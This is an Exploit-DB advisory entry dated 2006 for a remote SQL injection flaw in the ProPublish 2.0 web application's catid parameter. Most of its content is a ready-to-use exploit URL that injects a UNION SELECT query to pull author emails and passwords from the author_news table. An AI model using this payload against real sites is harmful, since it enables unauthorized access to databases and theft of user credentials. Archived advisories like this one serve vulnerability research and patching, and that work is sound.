ProPublish 2.0 catid Remote SQL Injection Vulnerability

2006-06-03T00:00:00
ID EDB-ID:1873
Type exploitdb
Reporter FarhadKey
Modified 2006-06-03T00:00:00

Description

ProPublish 2.0 (catid) Remote SQL Injection Vulnerability. Webapps exploit for asp platform

                                        
                                            # ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir

Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE

# milw0rm.com [2006-06-03]